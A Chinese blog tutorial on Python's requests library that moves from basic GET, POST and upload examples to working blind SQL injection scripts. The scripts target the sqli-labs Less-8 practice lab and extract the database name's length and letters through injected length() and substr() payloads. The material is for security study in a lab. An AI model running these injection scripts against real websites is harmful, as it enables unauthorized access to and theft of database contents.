高考过后,你不用告诉我你考多少分,悲喜之后也不要告诉我你志愿填了哪里,只要告诉我最后去了哪?我坐火车或飞机要多久,在此停留能否蹭口饭吃,一本二本我真的分不清楚,我只知道你是我朋友。。。
---- 网易云热评
一、环境
1、python3
2、用到的模块requests
二、requests模块应用
1、获取网页的内容
# coding=utf-8
import requests
res=requests.get("http://192.168.1.129/html/1.html")
print(res.content.decode("utf-8"))
2、获取头信息
3、获取提交的网址
print(res.headers)
print(res.url)
运行结果:
{'Date': 'Tue, 04 Aug 2020 13:01:06 GMT', 'Server': 'Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45', 'Last-Modified': 'Sun, 31 May 2020 15:48:24 GMT', 'ETag': '"676-5a6f39bc391c0"', 'Accept-Ranges': 'bytes', 'Content-Length': '1654', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html'}
http://192.168.1.129/html/1.html
4、修改访问时UA信息
# coding=utf-8
import requests
url="http://192.168.1.129/html/1.html"
header={"User-Agent":"aiyoubucuo"}
res=requests.get(url,headers=header)
print(res.request.headers)
运行结果:
{'User-Agent': 'aiyoubucuo', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'}
5、超时处理,网页超过三秒没有反应当做异常
# coding=utf-8
import requests
url="http://192.168.1.129/html/chaoshi.php"
try:
res=requests.get(url,timeout=3)
print(res.request.headers)
except Exception as e:
print("网页已超时!!!")
6、提交get数据
# coding=utf-8
import requests
url="http://192.168.1.129/get.php"
data={"aiyou":"bucuo"}
res=requests.get(url,params=data)
print(res.url)
运行结果:
http://192.168.1.129/get.php?aiyou=bucuo
7、POST提交数据
# coding=utf-8
import requests
url="http://192.168.1.129/post.php"
datas={"aiyou":"bucuo"}
res=requests.post(url,data=datas)
print(res.content.decode("utf-8"))
运行结果:
array(1) {
["aiyou"]=>
string(5) "bucuo"
}
8、上传文件
# coding=utf-8
import requests
url="http://192.168.1.129/shangchuan.php"
upfile={"file":open("123.txt","rb")}
datas={"submit":"submit"}
res=requests.post(url,files=upfile,data=datas)
print(res.content.decode("utf-8"))
运行结果:
三、获取数据库长度
#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=8' and (length(database())) = 8 --+
# coding=utf-8
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
dblen=0
while True:
dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
print(dburl)
if len(requests.get(dburl).text)==reslen:
print("数据库名字长度为:"+str(dblen))
break
if dblen==30:
print("出现错误!")
break
dblen+=1
运行结果:
四、获取数据库名字
# coding=utf-8
import string
import requests
url="http://192.168.1.129/sqli/Less-8/"
reslen=len(requests.get(url=url+"?id=1").text)
print("正常情况下网页返回数据的长度"+str(reslen))
#判断数据库长度,http://192.168.1.129/sqli/Less-8/?id=2' and (length(database())) = 8 --+
dblen=0
while True:
dburl=url+"?id=1'+and+(length(database()))="+str(dblen)+"--+"
print(dburl)
if len(requests.get(dburl).text)==reslen:
print("数据库名字长度为:"+str(dblen))
break
if dblen==30:
print("出现错误!")
break
dblen+=1
dbnmae=""
#生成8个字母
for i in range(1,9):
#获取字母从a-z
for a in string.ascii_lowercase:
dburl=url+"?id=1'+and+substr(database(),"+str(i)+",1)="+"'"+a+"'"+"--+"
print(dburl)
if len(requests.get(dburl).text)==reslen:
dbnmae+=a
print(dbnmae)
break
运行结果:
禁止非法,后果自负
欢迎关注公众号:web安全工具库
标签:get,Python,res,192.168,url,EXP,print,编写,requests From: https://blog.51cto.com/u_15288375/5970856